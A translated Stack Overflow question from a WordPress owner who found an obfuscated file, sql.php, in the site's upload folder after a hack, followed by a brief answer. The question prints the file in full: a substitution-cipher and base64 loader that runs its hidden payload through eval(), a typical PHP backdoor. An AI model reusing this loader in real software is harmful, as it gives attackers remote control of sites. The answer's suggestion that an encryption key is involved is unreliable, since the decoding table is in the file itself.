我有一个 wordpress 网站,最近我的网站被黑了,在检查后我在我的 wordpress 上传 forlder 中看到一个文件名 sql.php,并且 php 代码被编码。我已经删除了那个 php 文件,但现在我想知道这个文件是关于什么的?为什么他们把它放在我的网站上以及我如何解码它以了解这里写的是什么 php 命令..
sql.php 文件代码如下:
<?php
function ivq($duss, $djw) {
$naon = '';
for ($i = 0;$i < strlen($duss);$i++) {
$naon.= isset($djw[$duss[$i]]) ? $djw[$duss[$i]] : $duss[$i];
}
$nbkgehdymn = "base64_decode";
return $nbkgehdymn($naon);
}
$zkahl = 'OBLNqX2Ip1OM6sXxr92x1sVKpxrADPYXgPJf5JfCqQYf1HdLtivGzB2G1sXxr92xrxrADuCf5JfCqQYf1HdLtivGzQ' . '8T1sXTpQdetBLKzL23qQeL6xJvFi7ai7hIp1ZStBLbpX2AqQeftivJl' . 'gAli9L9lBLIrsX3liZSW3XmX7Xmlm7ljJM6682gZX6QZX6z6eh' . 'DW82gZWVB6e3v4mC0kxDaDCM6682gZX6QZX6z6e68gW2WZX2hZPZm6e3v4mC0FgDHkRCNFiTVDRAliQL9li8' . 'Lz1h3jmv71ed8WLp8WLAGm8ZWW82E13p4WLthW7Z8Z82BgeDG1m7fivLaiv76682gZX6QZX6z63UWX8' . '1XA0E06tDu3v6B6UpuAli16LtnXxz0h0E1dLdRZSpQYRzsZLlndLr9LUzBLypmv' . '7r9XIlm7aiG3=';
$viici = Array('1' => 'X', '0' => 'i', '3' => '0', '2' => '9', '5' => 'O', '4' => 'P', '7' => 'k', '6' => 'J', '9' => 'm', '8' => 'F', 'A' => 's', 'C' => 'A', 'B' => 'G', 'E' => 'Y', 'D' => 'I', 'G' => 'n', 'F' => 'M', 'I' => 'z', 'H' => '3', 'K' => 'v', 'J' => 'w', 'M' => 'o', 'L' => 'l', 'O' => 'Q', 'N' => 'u', 'Q' => 'W', 'P' => 'E', 'S' => 'f', 'R' => 'j', 'U' => 'h', 'T' => '4', 'W' => 'U', 'V' => 'x', 'Y' => '5', 'X' => 'V', 'Z' => 'R', 'a' => '7', 'c' => '8', 'b' => 't', 'e' => '1', 'd' => 'N', 'g' => 'T', 'f' => 'p', 'i' => 'C', 'h' => 'B', 'k' => 'L', 'j' => 'e', 'm' => 'S', 'l' => 'K', 'o' => 'r', 'n' => 'H', 'q' => 'a', 'p' => 'Z', 's' => '2', 'r' => 'c', 'u' => 'D', 't' => 'd', 'w' => 'q', 'v' => 'g', 'y' => '6', 'x' => 'y', 'z' => 'b');
eval(ivq($zkahl, $viici)); ?>
请帮助我...
最佳答案
黑客可能有一些Encryption Hash key或Salt来加密。
您不应为您的上传文件夹授予 777 权限或写入权限。限制它。
关于php - 如何解码编码的php文件,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/34605812/